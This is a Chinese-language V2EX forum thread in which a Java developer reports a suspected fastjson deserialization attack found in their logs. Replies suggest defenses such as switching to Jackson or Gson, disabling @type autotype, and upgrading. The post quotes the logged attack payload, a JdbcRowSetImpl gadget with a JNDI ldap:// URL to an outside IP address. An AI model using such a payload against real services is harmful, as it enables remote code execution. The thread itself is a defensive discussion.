V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
moe3000
V2EX  ›  Java

服务疑似被尝试 fastjson 漏洞攻击

  •  
  •   moe3000 · 270 天前 · 2901 次点击
    这是一个创建于 270 天前的主题,其中的信息可能已经有所发展或是发生改变。

    日志中查到有人发送异常参数至接口

    {"x":{{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://9.4.131.68:1389/fastjsonfc5fd1bcac3b753a7d4fa9dab78d162e","autoCommit":true}}
    

    查了下可能是 fastjson 反序列化攻击,目前项目使用的 fastjson 版本是 1.2.73 ,好像不在攻击范围内,请问下还有其他防御措施吗

    13 条回复    2022-05-07 14:53:52 +08:00
    Jooooooooo
        1
    Jooooooooo  
       270 天前
    换 jackson
    moe3000
        2
    moe3000  
    OP
       270 天前
    @Jooooooooo 下个、下个版本一定
    BBCCBB
        3
    BBCCBB  
       270 天前
    不知道关掉这个按 @type 来反序列化的功能能不能防止这个问题? 就 http 请求的参数的反序列化用不到这个 @type 的功能.
    bthulu
        4
    bthulu  
       270 天前   ❤️ 2
    不在攻击范围内, 有空就升级到最新版, 没空就不管它. jackson 一样有这样的问题.
    clf
        5
    clf  
       270 天前   ❤️ 3
    公司的代码规范检查插件里。就直接代码检查 com.alibaba 的包。有用到的禁止提交代码。gitlab 的 hooks 也是加了检查。
    RainCats
        6
    RainCats  
       270 天前   ❤️ 1
    @clf 有点极端了吧,完全不用阿里系的东西
    clf
        7
    clf  
       270 天前
    @RainCats #6 也用的,但只用开源基金会支持的,阿里已经捐给 apache 的都是 apache 的包名。主要是不用 fastjson
    ufan0
        8
    ufan0  
       270 天前
    @clf #7 咱公司上海有开放招聘吗?想投!!!
    fff333
        9
    fff333  
       270 天前
    @moe3000 gson
    banmuyutian
        10
    banmuyutian  
       270 天前
    @clf #5
    我现在还用的阿里项目仅剩下 easyexcel
    houzhishi
        11
    houzhishi  
       270 天前   ❤️ 1
    脚本小子在瞎跑,不用太在意,结合业务看是否可以关闭自省 @type
    clf
        12
    clf  
       269 天前
    @banmuyutian 我们是直接用的 POI ,和基础服务的数据结构(比如表单等)封装了接口。
    xiaopigfly
        13
    xiaopigfly  
       269 天前
    问题不大,只要放到公网就会有人扫描。正常的。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   广告投放   ·   实用小工具   ·   3999 人在线   最高记录 5497   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 58ms · UTC 06:15 · PVG 14:15 · LAX 22:15 · JFK 01:15
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.